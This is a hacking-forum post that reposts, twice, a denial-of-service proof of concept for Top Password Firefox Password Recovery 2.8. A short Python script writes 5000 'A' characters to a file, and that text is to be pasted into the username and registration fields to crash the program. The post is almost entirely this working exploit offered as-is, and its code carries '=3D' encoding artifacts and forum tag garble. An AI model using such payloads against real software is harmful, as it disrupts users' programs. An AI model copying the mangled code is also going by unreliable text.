SyntaxSin
Premium Member
- Joined
- October 8, 2025
- Messages
- 291
- Reaction score
- 1,031
- Points
- 93
- Thread Author
- #1
Platform - Windows
# Exploit Title: Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: Password Recovery Software - Recover Lost Password, Reset Windows Password
# Software Link: https://www.top-password.com/download/FirefoxPRSetup.exe
# Version: 2.8
# Tested on: Windows 7 SP1 32-bit
# Copy paste the contents of poc.txtinto the
# User Name / Registration Code input fields.
[HASH=31027]#!/usr[/HASH]/bin/python
poc =3D "A"*5000
file =3D open("poc.txt","w")
file.write(poc)
file.close()
[HASH=46536]#0day.today[/HASH] [-01-19]#
[/CODE]
# Exploit Title: Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: Password Recovery Software - Recover Lost Password, Reset Windows Password
# Software Link: https://www.top-password.com/download/FirefoxPRSetup.exe
# Version: 2.8
# Tested on: Windows 7 SP1 32-bit
# Copy paste the contents of poc.txtinto the
# User Name / Registration Code input fields.
[HASH=31027]#!/usr[/HASH]/bin/python
poc =3D "A"*5000
file =3D open("poc.txt","w")
file.write(poc)
file.close()
[HASH=46536]#0day.today[/HASH] [-01-19]#
[/CODE]